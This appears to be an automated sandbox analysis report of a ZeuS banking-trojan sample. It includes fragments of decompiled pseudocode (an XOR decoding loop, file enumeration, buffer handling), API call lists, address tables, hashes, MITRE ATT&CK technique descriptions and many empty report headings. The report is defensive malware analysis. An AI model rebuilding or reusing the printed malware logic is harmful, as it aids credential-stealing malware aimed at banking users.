									L22:
									_t122 = 0;
									__eflags =  *_t168;
									if( *_t168 == 0) {
										goto L28;
									} else {
										goto L23;
									}
									do {
										L23:
										_t122[_t168] = _t122[_t168] ^ 0x00000019;
										_t122 =  &(_t122[1]);
										__eflags = _t122[_t168];
									} while (_t122[_t168] != 0);
									__eflags = _t122;
									if(_t122 > 0) {
										_t169 =  &_v580;
										_t123 = 0x57;
										E0040F34A(_t123,  &_v580);
										_push(_t157);
										_push(_v676);
										_t158 = _v656;
										_push(_v652);
										_push(_v672);
										_t126 = E00405ED9(_t169, 0x311, _v656, _t169);
										_t174 = _t174 + 0x14;
										__eflags = _t126;
										if(_t126 > 0) {
											_t170 = _a4;
											_t127 = E004055DA(_t126, _t170, _t158);
											__eflags = _t127;
											if(_t127 != 0) {
												_t68 = _t170 + 4;
												 *_t68 =  &(( *(_t170 + 4))[1]);
												__eflags =  *_t68;
											}
										}
									}
									goto L28;
								}
								__eflags = _t121 - 0x31;
								if(_t121 != 0x31) {
									goto L22;
								}
								goto L21;
							}
							_v648 =  &(_t156[6]);
							E00414FA2();
							_t157 = E00405865(_v648,  &_v588, 0);
							__eflags = _t157 - 1;
							if(_t157 < 1) {
								goto L15;
							}
							__eflags = _t157 - 0xffff;
							if(_t157 <= 0xffff) {
								goto L16;
							}
							goto L15;
							L28:
							_v644 = _v644 + 1;
							__eflags = _v644 - _v648;
						} while (_v644 < _v648);
					}
					goto L29;
				} else {
					_t171 =  &_v612;
					E0040F34A(0x90, _t171);
					_v648 = _t171;
					E0040A91B( &_v524,  &_v648, _t177, 1, 5, E00414FBC, _a4, 0, 0, 0);
					goto L31;
				}
			}

0x00414fc2
0x00414fe0
0x00415240
0x00415248
0x00415248
0x00414fe6
0x00414fe9
0x0041502c
0x0041502f
0x00415034
0x00415039
0x0041503b
0x00000000
0x00000000
0x00415052
0x00415057
0x0041505b
0x0041505e
0x00415237
0x0041523b
0x00000000
0x0041523b
0x0041506e
0x0041507b
0x00415089
0x00415097
0x004150a5
0x004150aa
0x004150ae
0x00415221
0x00415225
0x00415232
0x00000000
0x00415232
0x004150b4
0x004150b8
0x004150bc
0x004150c8
0x004150c8
0x004150cc
0x004150d0
0x004150d4
0x00000000
0x00000000
0x004150e4
0x004150f6
0x00415106
0x00415116
0x00415118
0x0041511d
0x0041511f
0x00000000
0x00000000
0x00415125
0x0041512a
0x00000000
0x00000000
0x00415130
0x00415132
0x00000000
0x00000000
0x00415138
0x00415141
0x00415146
0x00415149
0x0041514d
0x00415156
0x0041515d
0x00415162
0x00415164
0x0041518e
0x00415190
0x00415191
0x00415195
0x00415198
0x00000000
0x00000000
0x0041519e
0x004151a1
0x00000000
0x00000000
0x004151a3
0x004151a5
0x004151a7
0x00000000
0x00000000
0x004151a9
0x004151ab
0x004151b1
0x004151b1
0x004151b5
0x00000000
0x00000000
0x004151b7
0x004151b7
0x004151b9
0x004151bb
0x00000000
0x00000000
0x00000000
0x00000000
0x004151bd
0x004151bd
0x004151bd
0x004151c1
0x004151c2
0x004151c2
0x004151c8
0x004151ca
0x004151ce
0x004151d2
0x004151d3
0x004151d8
0x004151d9
0x004151dd
0x004151e1
0x004151e7
0x004151f1
0x004151f6
0x004151f9
0x004151fb
0x004151fd
0x00415203
0x00415208
0x0041520a
0x0041520c
0x0041520c
0x0041520c
0x0041520c
0x0041520a
0x004151fb
0x00000000
0x004151ca
0x004151ad
0x004151af
0x00000000
0x00000000
0x00000000
0x004151af
0x0041516b
0x0041516f
0x0041517f
0x00415181
0x00415184
0x00000000
0x00000000
0x00415186
0x0041518c
0x00000000
0x00000000
0x00000000
0x0041520f
0x0041520f
0x00415217
0x00415217
0x004150c8
0x00000000
0x00414feb
0x00414feb
0x00414ff4
0x00414ffb
0x0041501b
0x00000000
0x0041501b

APIs

Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96

StrStrIA.SHLWAPI(?,?,?,?), ref: 004150E2
StrStrIA.SHLWAPI(?,?), ref: 004150F4
StrStrIA.SHLWAPI(?,?), ref: 00415104
StrStrIA.SHLWAPI(?,?), ref: 00415116

Part of subcall function 0040A91B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040A95A
Part of subcall function 0040A91B: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040A981
Part of subcall function 0040A91B: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040A9CB
Part of subcall function 0040A91B: Sleep.KERNEL32(00000000,?,?), ref: 0040AA28
Part of subcall function 0040A91B: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040AA56
Part of subcall function 0040A91B: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
String ID:
API String ID: 1075381090-0
Opcode ID: 11f419a4b4b3535076f168a56081f9b6e821dab2eccccb81fd2df71091b017a1
Instruction ID: 52f872ad30b7466ef2e2b938590e5b8dc5ac912a01d05dd39a6db22d60f4a30b
Opcode Fuzzy Hash: 11f419a4b4b3535076f168a56081f9b6e821dab2eccccb81fd2df71091b017a1
Instruction Fuzzy Hash: BF718A325087009FC721EF65C801ADBB7E5AFC8314F04096EF895A7292D738DD8ACB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00404BB4, Relevance: 5.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00404BB4(void* __eax, intOrPtr* __ebx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __esi;
				intOrPtr* _t14;
				intOrPtr* _t15;
				void* _t16;
				signed int _t22;
				signed short _t31;
				intOrPtr _t35;
				signed int _t37;
				intOrPtr* _t47;

				_t35 = _a4;
				_t14 = E00405D35(_t35);
				_t47 = _t14;
				_t15 = _t14 +  *_t14;
				 *_t15 =  *_t15 + _t15;
				 *__ebx =  *__ebx + __ebx;
				asm("std");
				if( *__ebx <= 0) {
					_push(__ebx);
					EnterCriticalSection(0x4223b8);
					_t31 = ( *0x4223b4 & 0x0000ffff) + _t47;
					if(_t31 <= 0x3e8) {
						_t16 = E00405171(_t31 + _t31, 0x4223ac);
						if(_t16 != 0) {
							_t37 =  *0x4223ac; // 0x0
							_t16 = E00405222(_t37 + ( *0x4223b4 & 0x0000ffff) * 2, _a4, _t47 + _t47);
							 *0x4223b4 = _t31;
						}
					} else {
						_t16 = E00405171(0x7d0, 0x4223ac);
						if(_t16 != 0) {
							_t21 = 0x3e8 - _t47;
							_t22 =  *0x4223ac; // 0x0
							E00405222(_t22, _t22 + (( *0x4223b4 & 0x0000ffff) - 0x3e8 - _t47) * 2, 0x3e8 - _t47 + _t21);
							_t16 = E00405222(0x3e8 - _t47 + _t21 +  *0x4223ac, _v8, _t47 + _t47);
							 *0x4223b4 = 0x3e8;
						}
					}
					LeaveCriticalSection(0x4223b8);
				} else {
					EnterCriticalSection(0x4223b8);
					asm("adc byte [edx], 0x40");
					_push( *0x4223ac);
					asm("lodsb");
					E004051E6();
					 *0x4223ac =  *0x4223ac & 0x00000000;
					_push(0x4223b8);
					 *0x4223b4 = 0;
					 *0x4223b4 = 0;
					_t16 = 0x23;
					asm("adc eax, 0x401288");
				}
				return _t16;
			}

0x00404bb4
0x00404bbb
0x00404bc0
0x00404bc4
0x00404bc5
0x00404bc6
0x00404bc8
0x00404bc9
0x00404bfd
0x00404c03
0x00404c10
0x00404c19
0x00404c69
0x00404c70
0x00404c72
0x00404c8b
0x00404c90
0x00404c90
0x00404c1b
0x00404c20
0x00404c27
0x00404c32
0x00404c39
0x00404c44
0x00404c58
0x00404c5d
0x00404c5d
0x00404c27
0x00404c9c
0x00404bcb
0x00404bd1
0x00404bd3
0x00404bd7
0x00404bd9
0x00404bdd
0x00404be2
0x00404beb
0x00404bec
0x00404bed
0x00404bee
0x00404bf3
0x00404bf3
0x00404ca6

APIs

EnterCriticalSection.KERNEL32(004223B8), ref: 00404BD1

Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9

LeaveCriticalSection.KERNEL32(004223B8), ref: 00404BF2
EnterCriticalSection.KERNEL32(004223B8), ref: 00404C03
LeaveCriticalSection.KERNEL32(004223B8), ref: 00404C9C

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CriticalSection$EnterLeave$FreeHeap
String ID:
API String ID: 1946732658-0
Opcode ID: 98082d35d31daef01d7124e6632e145c6764c3c6cff7e0a88f377e502cd866b0
Instruction ID: 7278ae7a32eb944289f3442de10c39b85b046942c1482217e93f18ba5a6ff180
Opcode Fuzzy Hash: 98082d35d31daef01d7124e6632e145c6764c3c6cff7e0a88f377e502cd866b0
Instruction Fuzzy Hash: 52218E71601214FBC720DFA4EE94A6A37A8EF90318740443FFD01A62A5DABD5806DB5D

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report ZeuS.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Protection of GUI:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: ZeuS.exe PID: 6624 Parent PID: 5644

General

File Activities

File Opened

File Attributes Queried

Other File Operations

Volume Information Queried

Function 0041C53B, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 227
libraryloadermemoryCOMMON

Function 004087D5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
COMMON

Function 0041D470, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83
sleepCOMMON

Function 00409789, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Function 0040E31C, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389
libraryloaderwindowCOMMON

Function 0041D16A, Relevance: 30.2, APIs: 20, Instructions: 242
synchronizationsleepshutdownCOMMON

Function 0040C874, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188
libraryloaderCOMMON

Function 00406B08, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Function 0041B567, Relevance: 16.4, APIs: 5, Strings: 4, Instructions: 671
synchronizationnetworkCOMMONCrypto

Function 0040B9A6, Relevance: 15.1, APIs: 10, Instructions: 92
threadCOMMON

Function 00404D51, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
windowCOMMON

Function 00412174, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 367
timenetworkCOMMON

Function 0040A91B, Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Function 004068B2, Relevance: 10.6, APIs: 7, Instructions: 52
threadCOMMON

Function 00419904, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207
stringCOMMON

Function 0040A860, Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Function 0041907D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
shutdownCOMMON

Function 00417DDC, Relevance: 6.2, APIs: 4, Instructions: 189
COMMON

Function 00409B46, Relevance: 6.1, APIs: 4, Instructions: 94
memoryinjectionCOMMON

Function 0040685B, Relevance: 6.0, APIs: 4, Instructions: 36
threadprocessCOMMON

Function 004130AB, Relevance: 3.2, APIs: 2, Instructions: 162
encryptionCOMMON

Function 0041C007, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON